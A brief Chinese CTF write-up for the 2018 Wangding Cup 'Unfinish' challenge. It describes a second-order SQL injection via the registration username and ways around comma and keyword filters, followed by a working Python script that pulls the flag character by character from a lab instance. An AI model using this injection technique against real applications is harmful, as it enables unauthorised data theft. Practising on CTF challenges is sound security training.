[网鼎杯2018]Unfinish

二次注入，注入点是在register.php传入的username中。

1.猜测语句

insert table values ('email','username','password')

2.表名是猜的

过滤了information

mysql版本是5.5.64，sys 库在MySQL5.6或更高版本才有。

3.每次都需要注意换邮箱

4.过滤了逗号，不能闭合。

要用from for

5.+如果被识别成空格，可以用%2B。用异或也可以实现

import requests
from bs4 import BeautifulSoup
import re

url = 'http://3facbb99-4fb4-44fa-8fae-fa28575f788a.node4.buuoj.cn:81/'
a = ''
for i in range(0,60):
    email = 'eqwews1@131416024w'+str(i)
    #insert table values ('email','username','password')
    payload = "0' + ascii(substr((select * from flag) from "+str(i)+" for 1))+'0"
    register = {'email':email,'username':payload,'password':'0'}
    login = {'email':email,'password':'0'}
    r1 = requests.post(url+'register.php',data = register)
    r2 = requests.post(url+'login.php', data = login,allow_redirects=True)
    soup = BeautifulSoup(r2.text,'html.parser')
    a+=chr(int(soup.span.string.strip()))
    print(a)

#print(soup.find_all('span'))
#print(re.findall(".*?</span>",r2.text)[0].replace('</span>','').strip(),end='') 不用bs4用re硬找